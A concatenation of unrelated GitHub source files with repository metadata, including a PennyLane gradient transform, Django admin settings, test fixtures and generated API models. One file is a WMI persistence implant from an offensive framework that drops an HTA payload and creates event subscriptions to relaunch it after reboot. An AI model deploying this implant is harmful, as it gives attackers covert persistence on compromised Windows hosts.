option is set to ``True``, the Jacobian of the classical
processing will be computed and included. When evaluated, the
returned Jacobian will be with respect to the QNode arguments.
- If ``False``, any internal QNode classical processing will be
**ignored**. When evaluated, the returned Jacobian will be with
respect to the **gate** arguments, and not the QNode arguments.
Supported gradient transforms must be of the following form:
.. code-block:: python
@gradient_transform
def my_custom_gradient(tape, argnum=None, **kwargs):
...
return gradient_tapes, processing_fn
where:
- ``tape`` (*QuantumTape*): the input quantum tape to compute the gradient of
- ``argnum`` (*int* or *list[int]* or *None*): Which trainable parameters of the tape
to differentiate with respect to. If not provided, the derivatives with respect to all
trainable inputs of the tape should be returned (``tape.trainable_params``).
- ``gradient_tapes`` (*list[QuantumTape]*): is a list of output tapes to be evaluated.
If this list is empty, no quantum evaluations will be made.
- ``processing_fn`` is a processing function to be applied to the output of the evaluated
``gradient_tapes``. It should accept a list of numeric results with length ``len(gradient_tapes)``,
and return the Jacobian matrix.
Once defined, the quantum gradient transform can be used as follows:
>>> gradient_tapes, processing_fn = my_custom_gradient(tape, *gradient_kwargs)
>>> res = execute(tapes, dev, interface="autograd", gradient_fn=qml.gradients.param_shift)
>>> jacobian = processing_fn(res)
Alternatively, gradient transforms can be applied directly to QNodes,
in which case the execution is implicit:
>>> fn = my_custom_gradient(qnode, *gradient_kwargs)
>>> fn(weights) # transformed function takes the same arguments as the QNode
1.2629730888100839
.. note::
The input tape might have parameters of various types, including
NumPy arrays, JAX Arrays, and TensorFlow and PyTorch tensors.
If the gradient transform is written in a autodiff-compatible manner, either by
using a framework such as Autograd or TensorFlow, or by using ``qml.math`` for
tensor manipulation, then higher-order derivatives will also be supported.
Alternatively, you may use the ``tape.unwrap()`` context manager to temporarily
convert all tape parameters to NumPy arrays and floats:
>>> with tape.unwrap():
... params = tape.get_parameters() # list of floats
"""
def __init__(
self, transform_fn, expand_fn=expand_invalid_trainable, differentiable=True, hybrid=True
):
self.hybrid = hybrid
super().__init__(transform_fn, expand_fn=expand_fn, differentiable=differentiable)
def default_qnode_wrapper(self, qnode, targs, tkwargs): # pylint: disable=too-many-statements
# Here, we overwrite the QNode execution wrapper in order
# to take into account that classical processing may be present
# inside the QNode.
hybrid = tkwargs.pop("hybrid", self.hybrid)
_wrapper = super().default_qnode_wrapper(qnode, targs, tkwargs)
def jacobian_wrapper(
*args, **kwargs
): # pylint: disable=too-many-return-statements, too-many-branches, too-many-statements
argnum = tkwargs.get("argnum", None)
argnums = tkwargs.get("argnums", None)
interface = qml.math.get_interface(*args)
trainable_params = qml.math.get_trainable_indices(args)
if interface == "jax" and argnum:
warnings.warn(
"argnum is deprecated with the Jax interface. You should use argnums instead."
)
tkwargs.pop("argnum")
argnums = argnum
if interface == "jax" and not trainable_params:
if argnums is None:
argnums_ = [0]
else:
argnums_ = [argnums] if isinstance(argnums, int) else argnums
params = qml.math.jax_argnums_to_tape_trainable(
qnode, argnums_, self.expand_fn, args, kwargs
)
argnums_ = qml.math.get_trainable_indices(params)
kwargs["argnums"] = argnums_
elif not trainable_params:
warnings.warn(
"Attempted to compute the gradient of a QNode with no trainable parameters. "
"If this is unintended, please add trainable parameters in accordance with "
"the chosen auto differentiation framework."
)
return ()
qjac = _wrapper(*args, **kwargs)
if not hybrid:
return qjac
kwargs.pop("shots", False)
# Special case where we apply a Jax transform (jacobian e.g.) on the gradient transform and argnums are
# defined on the outer transform and therefore on the args.
if interface == "jax":
argnum_cjac = trainable_params or argnums
else:
argnum_cjac = None
cjac = qml.transforms.classical_jacobian(
qnode, argnum=argnum_cjac, expand_fn=self.expand_fn
)(*args, **kwargs)
if qml.active_return():
if isinstance(cjac, tuple) and len(cjac) == 1:
cjac = cjac[0]
if not isinstance(cjac, tuple):
is_square = cjac.ndim == 2 and cjac.shape[0] == cjac.shape[1]
if not qml.math.is_abstract(cjac):
if is_square and qml.math.allclose(cjac, qml.numpy.eye(cjac.shape[0])):
# Classical Jacobian is the identity. No classical processing
# is present inside the QNode.
return qjac
multi_meas = len(qnode.tape.measurements) > 1
if multi_meas:
multi_params = isinstance(cjac, tuple) or isinstance(qjac[0], tuple)
else:
multi_params = isinstance(cjac, tuple) or isinstance(qjac, tuple)
if not multi_params and not multi_meas:
if qjac.shape == ():
qjac = qml.math.reshape(qjac, (1,))
# With dimension e.g. probs
else:
qjac = qml.math.reshape(qjac, (1, -1))
return qml.math.tensordot(qjac, cjac, [[0], [0]])
if multi_meas and not multi_params:
jacs = tuple(
qml.math.tensordot(qml.math.reshape(q, (1,)), cjac, [[0], [0]])
if q.shape == ()
else qml.math.tensordot(qml.math.reshape(q, (1, -1)), cjac, [[0], [0]])
for q in qjac
)
return jacs
if not multi_meas and multi_params:
if not isinstance(cjac, tuple):
jacs = qml.math.tensordot(
qml.math.stack(qjac), qml.math.stack(cjac), [[0], [0]]
)
else:
jacs = tuple(
qml.math.tensordot(qml.math.stack(qjac), c, [[0], [0]])
for c in cjac
if c is not None
)
return jacs
# Multi measurement and multi params
if not isinstance(cjac, tuple):
jacs = tuple(
qml.math.tensordot(qml.math.stack(q), qml.math.stack(cjac), [[0], [0]])
for q in qjac
)
else:
jacs = tuple(
tuple(
qml.math.tensordot(qml.math.stack(q), c, [[0], [0]])
for c in cjac
if c is not None
)
for q in qjac
)
return jacs
if isinstance(cjac, tuple):
# Classical processing of multiple arguments is present. Return qjac @ cjac.
jacs = tuple(
qml.math.tensordot(qjac, c, [[-1], [0]]) for c in cjac if c is not None
)
if len(jacs) == 1:
return jacs[0]
return jacs
is_square = cjac.ndim == 2 and cjac.shape[0] == cjac.shape[1]
if is_square and qml.math.allclose(cjac, qml.numpy.eye(cjac.shape[0])):
# Classical Jacobian is the identity. No classical processing
# is present inside the QNode.
return qjac
return qml.math.tensordot(qjac, cjac, [[-1], [0]])
return jacobian_wrapper
| [
"noreply@github.com"
] | stjordanis.noreply@github.com |
14961a035531cf4e9da1f2cb7f06758d31a3e389 | f33808410c0ad3a16099a81a130b8e2c25d4e641 | /modules/implant/persist/wmi.py | ef97800b0a0e03e908338e62b90d11b3e0725904 | [
"Apache-2.0"
] | permissive | marciopocebon/entypreter | 96994ec6a6e35f4b31bf1b16aeff29b75c7b5bc3 | 6a165589c4853c33e7f5eb6fd3a1326bfc37870e | refs/heads/master | 2020-09-05T06:54:31.674617 | 2019-11-05T13:48:35 | 2019-11-05T13:48:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,937 | py | import core.job
import core.implant
import core.loader
import uuid
import string
import random
class WMIPersistJob(core.job.Job):
def create(self):
if self.session_id == -1:
self.error("0", "This job is not yet compatible with ONESHOT stagers.", "ONESHOT job error.", "")
return False
if self.session.elevated != 1:
self.error("0", "This job requires an elevated session.", "Not elevated!", "")
return False
id = self.options.get("PAYLOAD")
payload = self.load_payload(id)
self.options.set("CMD", payload)
self.options.set("DIRECTORY", self.options.get('DIRECTORY').replace("\\", "\\\\").replace('"', '\\"'))
self.options.set("FDROPDIR", self.options.get('DROPDIR').replace("\\", "\\\\").replace('"', '\\"'))
if self.options.get('DROPFILE'):
self.options.set('FDROPFILE', self.options.get('DROPFILE')+'.hta')
else:
self.options.set('DROPFILE', ''.join(random.choice(string.ascii_uppercase) for _ in range(10)))
self.options.set('FDROPFILE', self.options.get('DROPFILE')+'.hta')
def report(self, handler, data, sanitize = False):
task = handler.get_header("Task", False)
upload = handler.get_header('X-UploadFileJob', False)
if upload == "true":
dropper_script = core.loader.load_script(self.options.get("LDROPFILE"), self.options)
template = core.loader.load_script("data/stager/js/mshta/template.hta")
fdata = handler.post_process_script(dropper_script, template, self.options, self.session, False)
headers = {}
headers['Content-Type'] = 'application/octet-stream'
headers['Content-Length'] = len(fdata)
handler.reply(200, fdata, headers)
return
data = data.decode()
if task == "CreateFilter":
handler.reply(200)
if data:
self.shell.print_good("__EventFilter created!")
self.shell.print_command("wmic /NAMESPACE:\"\\\\root\\subscription\" PATH __EventFilter WHERE Name=\"Entypreter\" DELETE")
else:
self.shell.print_error("__EventFilter could not be created, this implant will probably fail :/")
return
if task == "CreateConsumer":
handler.reply(200)
if data:
self.shell.print_good("CommandLineEventConsumer created!")
self.shell.print_command("wmic /NAMESPACE:\"\\\\root\\subscription\" PATH CommandLineEventConsumer WHERE Name=\"Entypreter\" DELETE")
else:
self.shell.print_error("CommandLineEventConsumer could not be created, this implant will probably fail :/")
return
if task == "CreateBinding":
handler.reply(200)
if data:
self.shell.print_good("__FilterToConsumerBinding created! Persistence has been established! If the target reboots, a session should come back 4-5 minutes later :)")
self.shell.print_command("wmic /NAMESPACE:\"\\\\root\\subscription\" PATH __FilterToConsumerBinding WHERE \"__PATH like '%Entypreter%'\" DELETE")
else:
self.shell.print_error("__FilterToConsumerBinding could not be created, this implant will probably fail :/")
return
if task == "RemovePersistence":
handler.reply(200)
if data:
self.shell.print_good("Persistence removed successfully.")
else:
self.shell.print_error("Could not remove persistence :/")
self.shell.print_command("wmic /NAMESPACE:\"\\\\root\\subscription\" PATH __EventFilter WHERE Name=\"Entypreter\" DELETE")
self.shell.print_command("wmic /NAMESPACE:\"\\\\root\\subscription\" PATH CommandLineEventConsumer WHERE Name=\"Entypreter\" DELETE")
self.shell.print_command("wmic /NAMESPACE:\"\\\\root\\subscription\" PATH __FilterToConsumerBinding WHERE \"__PATH like '%Entypreter%'\" DELETE")
return
if task == "AddDropper":
handler.reply(200)
if "true" in data.split("~~~")[0]:
self.shell.print_good("HTA file dropped at "+data.split("~~~")[1].split()[0])
self.shell.print_command("del /f "+data.split("~~~")[1].split()[0])
else:
self.shell.print_error("HTA file could not be dropped. Consider cleaning up and choosing a different DROPDIR.")
return
if task == "DeleteDropper":
handler.reply(200)
if "false" in data.split("~~~")[0]:
self.shell.print_good("HTA file deleted from "+data.split("~~~")[1].split()[0])
else:
self.shell.print_error("HTA file could not be deleted.")
self.shell.print_command("del /f "+data.split("~~~")[1].split()[0])
return
if data == "Complete":
super(WMIPersistJob, self).report(handler, data)
handler.reply(200)
def done(self):
self.results = "Completed!"
self.display()
def display(self):
# self.shell.print_plain(self.data)
pass
class WMIPersistImplant(core.implant.Implant):
NAME = "WMI Persistence"
DESCRIPTION = "Creates persistence using a WMI subscription."
AUTHORS = ["Entynetproject"]
STATE = "implant/persist/wmi"
def load(self):
self.options.register("PAYLOAD", "", "Payload to stage.")
self.options.register("CMD", "", "Command.", hidden=True)
self.options.register("CLEANUP", "false", "Will remove the created user.", enum=["true", "false"])
self.options.register("DIRECTORY", "%TEMP%", "Writeable directory for output.", required=False)
self.options.register("LDROPFILE", "data/implant/persist/wmi.dropper", "Local file to drop on the target.", advanced=True)
self.options.register("DROPDIR", "%ALLUSERSPROFILE%", "Directory to place the drop file.", advanced=True)
self.options.register("FDROPDIR", "", "", hidden=True)
self.options.register("RETRYATTEMPTS", "5", "Number of times to retry calling back before self-terminating (-1 == infinite).")
self.options.register("RETRYDELAY", "60", "Seconds between retry attempts.")
self.options.register("DROPFILE", "", "Name to give the drop file (randomly generated if no name).", advanced=True)
self.options.register("FDROPFILE", "", "", hidden=True)
def job(self):
return WMIPersistJob
def run(self):
id = self.options.get("PAYLOAD")
payload = self.load_payload(id)
if payload is None:
self.shell.print_error("Payload %s not found." % id)
return
payloads = {}
payloads["js"] = "data/implant/persist/wmi.js"
self.dispatch(payloads, self.job)
| [
"noreply@github.com"
] | marciopocebon.noreply@github.com |
8368bfbd0e4777b5c99e341ea7c5c3253dd539f6 | 0626949c68622a787fa5d860d654c862676a77e7 | /muxue/user/adminx.py | 7bff5abe2de350bb8bce165760789b265e48d5c5 | [] | no_license | GBXZ/muxueonline | 37f74d51a9d275bde62197addf3f08ac517a52b8 | bf9af33d65a960e6ac9e796587c3ed9cdceba25d | refs/heads/master | 2020-03-26T22:39:15.556180 | 2018-09-28T23:38:55 | 2018-09-28T23:38:55 | 145,477,178 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,315 | py | # _*_ coding:utf-8 _*_
from django.contrib import admin
from .models import EmailVerifyRecord,Banner
from django.db import models
from datetime import datetime
import xadmin #重要
from xadmin import views #修改主题需要导入views
class BaseSetting(object): #修改xadmin主题
enable_themes = True
use_bootswatch = True
class GlobalSettings(object): #修改xadmin头部和底部字体
site_title = "慕学后台管理系统"
site_footer = "慕学在线网"
menu_style = "accordion"
class EmailVerifyRecordAdmin(object):
list_display = ["code","email","send_type","send_time"] #显示的字段
search_fields = ["code","email","send_type"] #能够搜索的字段
list_filter = ["code","email","send_type","send_time"] #过滤器
class BannerAdmin(object):
list_display = ["title","image","url","index","add_time"] #显示的字段
search_fields = ["title","image","url","index"] #能够搜索的字段
list_filter = ["title","image","url","index","add_time"] #过滤器
xadmin.site.register(EmailVerifyRecord,EmailVerifyRecordAdmin)
xadmin.site.register(Banner,BannerAdmin)
xadmin.site.register(views.BaseAdminView,BaseSetting) #用来修改xadmin主题
xadmin.site.register(views.CommAdminView,GlobalSettings) #用来修改xadmin底部头部字体
# Register your models here.
| [
"="
] | = |
0e5d6f781d7332442b268007501ec4e99b025beb | ad13583673551857615498b9605d9dcab63bb2c3 | /output/instances/nistData/list/unsignedInt/Schema+Instance/NISTXML-SV-IV-list-unsignedInt-whiteSpace-1-5.py | 4139e151403a4f62685e832b8f9ab13a90d624e4 | [
"MIT"
] | permissive | tefra/xsdata-w3c-tests | 397180205a735b06170aa188f1f39451d2089815 | 081d0908382a0e0b29c8ee9caca6f1c0e36dd6db | refs/heads/main | 2023-08-03T04:25:37.841917 | 2023-07-29T17:10:13 | 2023-07-30T12:11:13 | 239,622,251 | 2 | 0 | MIT | 2023-07-25T14:19:04 | 2020-02-10T21:59:47 | Python | UTF-8 | Python | false | false | 456 | py | from output.models.nist_data.list_pkg.unsigned_int.schema_instance.nistschema_sv_iv_list_unsigned_int_white_space_1_xsd.nistschema_sv_iv_list_unsigned_int_white_space_1 import NistschemaSvIvListUnsignedIntWhiteSpace1
obj = NistschemaSvIvListUnsignedIntWhiteSpace1(
value=[
0,
561145125,
4003068322,
3467607955,
1588590776,
1695804895,
736059152,
4016801897,
4294967295,
]
)
| [
"tsoulloftas@gmail.com"
] | tsoulloftas@gmail.com |
d8503c891c61ca578f7de87638d0b8b2ee588861 | 4a307849ed4dded5ce84b0ceb6d2cf56c2e64b89 | /fixtures/physical_router_fixture.py | 2735390c29f1263942639fc49bf7dfc581280ae3 | [
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
] | permissive | lmadhusudhanan/contrail-test | a6316b41dcb836315d25503f1dee511943d7f976 | bd39ff19da06a20bd79af8c25e3cde07375577cf | refs/heads/master | 2022-05-04T20:01:58.960911 | 2018-06-27T17:56:47 | 2018-06-27T17:56:47 | 138,913,918 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,453 | py | from netaddr import *
import vnc_api_test
from pif_fixture import PhysicalInterfaceFixture
from physical_device_fixture import PhysicalDeviceFixture
class PhysicalRouterFixture(PhysicalDeviceFixture):
'''Fixture to manage Physical Router objects
Mandatory:
:param name : name of the device
:param mgmt_ip : Management IP
Optional:
:param vendor : juniper
:param model : mx
:param asn : default is 64512
:param ssh_username : Login username to ssh, default is root
:param ssh_password : Login password, default is Embe1mpls
:param :tunnel_ip : Tunnel IP (for vtep)
:ports : List of Ports which are available to use
Inherited optional parameters:
:param domain : default is default-domain
:param project_name : default is admin
:param cfgm_ip : default is 127.0.0.1
:param api_port : default is 8082
:param connections : ContrailConnections object. default is None
:param username : default is admin
:param password : default is contrail123
:param auth_server_ip : default is 127.0.0.1
'''
def __init__(self, *args, **kwargs):
super(PhysicalRouterFixture, self).__init__(self, *args, **kwargs)
self.name = args[0]
self.mgmt_ip = args[1]
self.vendor = kwargs.get('vendor', 'juniper')
self.model = kwargs.get('model','mx')
self.asn = kwargs.get('asn','64512')
self.tunnel_ip = kwargs.get('tunnel_ip', self.mgmt_ip)
self.ports = kwargs.get('ports', [])
self.bgp_router = None
self.bgp_router_already_present = False
try:
if self.inputs.verify_thru_gui():
from webui_test import WebuiTest
self.webui = WebuiTest(self.connections, self.inputs)
self.kwargs = kwargs
except Exception as e:
pass
# end __init__
def create_bgp_router(self):
bgp_router = vnc_api_test.BgpRouter(self.name, parent_obj=self._get_ip_fabric_ri_obj())
params = vnc_api_test.BgpRouterParams()
params.address = self.tunnel_ip
params.address_families = vnc_api_test.AddressFamilies(['route-target',
'inet-vpn', 'e-vpn', 'inet6-vpn'])
params.autonomous_system = int(self.asn)
params.vendor = self.vendor
params.identifier = self.mgmt_ip
bgp_router.set_bgp_router_parameters(params)
bgp_router_id = self.vnc_api_h.bgp_router_create(bgp_router)
bgp_router_obj = self.vnc_api_h.bgp_router_read(id=bgp_router_id)
self.logger.info('Created BGP router %s with ID %s' % (
bgp_router_obj.fq_name, bgp_router_obj.uuid))
return bgp_router_obj
# end create_bgp_router
def delete_bgp_router(self):
self.vnc_api_h.bgp_router_delete(id=self.bgp_router.uuid)
self.logger.info('Deleted BGP router : %s' % (self.bgp_router.uuid))
def add_bgp_router(self, bgp_router):
self.phy_device = self.vnc_api_h.physical_router_read(id=self.phy_device.uuid)
self.phy_device.add_bgp_router(bgp_router)
self.vnc_api_h.physical_router_update(self.phy_device)
def unbind_bgp_router(self, bgp_router):
self.phy_device = self.vnc_api_h.physical_router_read(id=self.phy_device.uuid)
self.phy_device.del_bgp_router(bgp_router)
self.vnc_api_h.physical_router_update(self.phy_device)
def delete_device(self):
self.phy_device = self.vnc_api_h.physical_router_read(id=self.phy_device.uuid)
self.phy_device.del_bgp_router(self.bgp_router)
self.vnc_api_h.physical_router_update(self.phy_device)
super(PhysicalRouterFixture, self).delete_device()
def setUp(self):
super(PhysicalRouterFixture, self).setUp()
bgp_fq_name = ['default-domain', 'default-project',
'ip-fabric', '__default__', self.name]
try:
self.bgp_router = self.vnc_api_h.bgp_router_read(
fq_name=bgp_fq_name)
self.already_present = True
self.logger.info('BGP router %s already present' % (
bgp_fq_name))
self.bgp_router_already_present = True
except vnc_api_test.NoIdError:
if self.inputs.is_gui_based_config():
self.bgp_router = self.webui.create_bgp_router(self)
else:
self.bgp_router = self.create_bgp_router()
try:
if not self.inputs.is_gui_based_config():
self.add_bgp_router(self.bgp_router)
except Exception as e:
pass
self.router_session = self.get_connection_obj(self.vendor,
host=self.mgmt_ip,
username=self.ssh_username,
password=self.ssh_password,
logger=self.logger)
def cleanUp(self):
super(PhysicalRouterFixture, self).cleanUp()
do_cleanup = True
if self.bgp_router_already_present:
do_cleanup = False
if do_cleanup:
if self.inputs.is_gui_based_config():
self.webui.delete_bgp_router(self)
else:
self.delete_bgp_router()
def get_irb_mac(self):
return self.router_session.get_mac_address('irb')
def get_virtual_gateway_mac(self, ip_address):
return self.router_session.get_mac_in_arp_table(ip_address)
# end PhysicalRouterFixture
if __name__ == "__main__":
pass
| [
"lmadhusudhan@juniper.net"
] | lmadhusudhan@juniper.net |
e7bc050fb62cf8278450687a7d0018fb13307a67 | 5cff419c080e87ac82e17c9cee8329faa6b66188 | /eventsourcing/tests/test_thespian_runner_with_django.py | d58bb32f104b867ffd389700578e99a714b32868 | [
"BSD-3-Clause"
] | permissive | Shaibujnr/eventsourcing | 56ab35e44a634822a3ce22562c20cfa83b24a73f | a2d8a7ff728f89714f0529791f3bd56498297784 | refs/heads/master | 2022-06-05T04:46:18.159071 | 2020-03-11T18:46:44 | 2020-03-11T18:46:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 358 | py | from eventsourcing.tests.sequenced_item_tests.test_django_record_manager import (
DjangoTestCase,
)
from eventsourcing.application.django import DjangoApplication
from eventsourcing.tests.test_thespian_runner import TestThespianRunner
class TestThespianRunnerWithDjango(DjangoTestCase, TestThespianRunner):
infrastructure_class = DjangoApplication
| [
"john.bywater@appropriatesoftware.net"
] | john.bywater@appropriatesoftware.net |
bf093a092413ad521ff3443ebcd6a938f922c0ff | 727f1bc2205c88577b419cf0036c029b8c6f7766 | /out-bin/py/google/fhir/models/run_locally.runfiles/com_google_fhir/external/pypi__tensorflow_1_12_0/tensorflow-1.12.0.data/purelib/tensorflow/python/estimator/training.py | cde5e25c415bc1d204d3f60f2bd3ffb0f37cc756 | [
"Apache-2.0"
] | permissive | rasalt/fhir | 55cf78feed3596a3101b86f9e9bbf6652c6ed4ad | d49883cc4d4986e11ca66058d5a327691e6e048a | refs/heads/master | 2020-04-13T00:16:54.050913 | 2019-01-15T14:22:15 | 2019-01-15T14:22:15 | 160,260,223 | 0 | 0 | Apache-2.0 | 2018-12-03T22:07:01 | 2018-12-03T22:07:01 | null | UTF-8 | Python | false | false | 180 | py | /home/rkharwar/.cache/bazel/_bazel_rkharwar/c4bcd65252c8f8250f091ba96375f9a5/external/pypi__tensorflow_1_12_0/tensorflow-1.12.0.data/purelib/tensorflow/python/estimator/training.py | [
"ruchika.kharwar@gmail.com"
] | ruchika.kharwar@gmail.com |
106728c42ed86048ef123884e38430115efdd1af | c2d4968c32a4356138a82d9684c86d8759b6f47b | /groupdocs/models/SignatureEnvelopeDocumentsResult.py | 30939f8d6839534c8d55bb88f5e1c622bf254a4a | [] | no_license | liosha2007/groupdocs-heroku-examples-for-python | 77ffe432883f266dc049a8bc4e966fd86a717577 | a96a89c7d9e8798fd5bf769e0c929dfaa1702bf9 | refs/heads/master | 2021-01-01T19:43:27.526546 | 2013-08-05T05:43:34 | 2013-08-05T05:43:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,066 | py | #!/usr/bin/env python
"""
Copyright 2012 GroupDocs.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class SignatureEnvelopeDocumentsResult:
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually."""
def __init__(self):
self.swaggerTypes = {
'documents': 'list[SignatureEnvelopeDocumentInfo]',
'envelopeId': 'str'
}
self.documents = None # list[SignatureEnvelopeDocumentInfo]
self.envelopeId = None # str
| [
"aleksey.permyakov@groupdocs.com"
] | aleksey.permyakov@groupdocs.com |
e6108fb32123d4fbee90708c4cf86bb1e6b75ce0 | ff23e5c890216a1a63278ecb40cd7ac79ab7a4cd | /clients/kratos/python/test/test_message.py | d7bbd553c9e96215a809d9ad5f8b74270dafedb9 | [
"Apache-2.0"
] | permissive | ory/sdk | fcc212166a92de9d27b2dc8ff587dcd6919e53a0 | 7184e13464948d68964f9b605834e56e402ec78a | refs/heads/master | 2023-09-01T10:04:39.547228 | 2023-08-31T08:46:23 | 2023-08-31T08:46:23 | 230,928,630 | 130 | 85 | Apache-2.0 | 2023-08-14T11:09:31 | 2019-12-30T14:21:17 | C# | UTF-8 | Python | false | false | 1,284 | py | """
Ory Identities API
This is the API specification for Ory Identities with features such as registration, login, recovery, account verification, profile settings, password reset, identity management, session management, email and sms delivery, and more. # noqa: E501
The version of the OpenAPI document: v1.0.0
Contact: office@ory.sh
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import ory_kratos_client
from ory_kratos_client.model.courier_message_status import CourierMessageStatus
from ory_kratos_client.model.courier_message_type import CourierMessageType
from ory_kratos_client.model.message_dispatch import MessageDispatch
globals()['CourierMessageStatus'] = CourierMessageStatus
globals()['CourierMessageType'] = CourierMessageType
globals()['MessageDispatch'] = MessageDispatch
from ory_kratos_client.model.message import Message
class TestMessage(unittest.TestCase):
"""Message unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testMessage(self):
"""Test Message"""
# FIXME: construct object with mandatory attributes with example values
# model = Message() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"3372410+aeneasr@users.noreply.github.com"
] | 3372410+aeneasr@users.noreply.github.com |
a87b819f18508bfd72a1ccd2fc1fce02dfdf811c | 4133fce90189868a246e916a5851dc05bf5e2172 | /eOwner/bookbus/forms.py | 6c08628a00148c0cc38fe490fd975d8d288ad4a9 | [] | no_license | achanyasuresh12/eowner | 47ea8dfeb7dc63c1ea934d1d05f0714f14a3fde8 | bcfd6d3069a34e3bde7c760a60d43a7553078b23 | refs/heads/master | 2020-04-07T19:10:59.995107 | 2018-11-22T04:24:15 | 2018-11-22T04:24:15 | 158,639,004 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 186 | py | from django import forms
from . import models
class bookbus_forms(forms.ModelForm):
class Meta:
model = models.Bookbus
fields = ["source", "destination", "date"]
| [
"45094866+achanyasuresh12@users.noreply.github.com"
] | 45094866+achanyasuresh12@users.noreply.github.com |
a161fd71a289da90daa7f083d6e9669340fa178b | 5c7da7dabdc076ad7113ccd20561a8bbf5f9a70e | /documents/migrations/0039_auto_20200921_1652.py | 14c75f0cf092c56569d4c8734f95d131ab823e9a | [] | no_license | aqcloudacio/cloudaciofeez | 2499fb5fc5334fa871daab2abea6c34bfa8c7667 | 8399560ece9aa10a6d6801f42c027dca26a65936 | refs/heads/master | 2023-02-27T22:36:20.501159 | 2021-02-11T00:03:46 | 2021-02-11T00:03:46 | 337,887,413 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 714 | py | # Generated by Django 2.2.7 on 2020-09-21 06:52
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('documents', '0038_theme_default'),
]
operations = [
migrations.AlterField(
model_name='structure',
name='theme',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, related_name='structures', to='documents.Theme'),
preserve_default=False,
),
migrations.AddConstraint(
model_name='structure',
constraint=models.UniqueConstraint(fields=('theme',), name='unique_theme'),
),
]
| [
"alejandro.quintero@clouxter.com"
] | alejandro.quintero@clouxter.com |
fcf1b34b972a4a2c7edd899130321198c2ddb57c | ff62ac78e34cdaf6d5d3bc7230a4f4aee740b142 | /HigherLowerGameProject/main.py | 6276b3debd940e6df69de059668e95a99a27fdd8 | [] | no_license | suriyaganesh97/pythonbasicprogs | 7ff67ca6193150d9c61e1eb10e2727694d9b7c6e | ffb599f1804654785757fea4b0f36b11094a4fae | refs/heads/master | 2022-01-03T22:07:27.625938 | 2022-01-02T11:35:28 | 2022-01-02T11:35:28 | 253,271,886 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,213 | py | import random
from gameData import data
#print two random person initially followers store in variable
dict_1 = random.choice(data)
dict_1_follower_count = dict_1["follower_count"]
is_game_over = False
current_score = 0
while not is_game_over:
dict_2 = random.choice(data)
dict_2_follower_count = dict_2["follower_count"]
print(f'A is {dict_1["name"]}, description is {dict_1["description"]}, country is {dict_1["country"]}')
print(f'B is {dict_2["name"]}, description is {dict_2["description"]}, country is {dict_2["country"]}')
# print statemnets for debugging
print(dict_1_follower_count)
print(dict_2_follower_count)
user_guess = input("who do you think has high no of followers A or B: ")
if user_guess == "A" or user_guess == "a":
if dict_1_follower_count > dict_2_follower_count:
print(f'yes you are right.{dict_1["name"]} has {dict_1_follower_count} followers and {dict_2["name"]} has only {dict_2_follower_count} followers')
current_score += 1
elif dict_2_follower_count > dict_1_follower_count:
print(f'you are wrong.{dict_2["name"]} has {dict_2_follower_count} followers while {dict_1["name"]} has only {dict_1_follower_count} followers')
print(f"your total score is {current_score}")
is_game_over = True
else:
print(f'both have same no of {dict_1_follower_count} followers')
elif user_guess == "B" or user_guess == "b":
if dict_2_follower_count > dict_1_follower_count:
print(f'yes you are right.{dict_2["name"]} has {dict_2_follower_count} followers and {dict_1["name"]} has only {dict_1_follower_count} followers')
current_score += 1
dict_1 = dict_2
elif dict_1_follower_count > dict_2_follower_count:
print(f'you are wrong.{dict_1["name"]} has {dict_1_follower_count} followers while {dict_2["name"]} has only {dict_2_follower_count} followers')
print(f"your total score is {current_score}")
is_game_over = True
else:
print(f'both have same no of {dict_1_follower_count} followers')
else:
print("invalid input")
is_game_over = True
| [
"63084594+suriyaganesh97@users.noreply.github.com"
] | 63084594+suriyaganesh97@users.noreply.github.com |
6e599fcae811e39f224deb33642d5b53f53e2cc0 | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/anagram/aa70888571c94b16a02aa4c0091b8a3d.py | c2c1e5316f2a4644a2bd524ee4689277fd168164 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 525 | py | def detect_anagrams(word, list):
final = []
count = {}
for s in word.lower():
if count.has_key(s):
count[s] += 1
else:
count[s] = 1
for w in list:
if w.lower() != word:
wcount = {}
for s in w.lower():
if wcount.has_key(s):
wcount[s] += 1
else:
wcount[s] = 1
if wcount == count:
final.append(w)
return final
| [
"rrc@berkeley.edu"
] | rrc@berkeley.edu |
3aefdabdebf9932e2ea0544a8fd53183c0ecebdf | c89543dd926c1787c40616ed174a3d1371c54449 | /superset/utils/date_parser.py | 7e79c72f1eb780198498781f58549b99fbbf3d9a | [
"Apache-2.0",
"OFL-1.1"
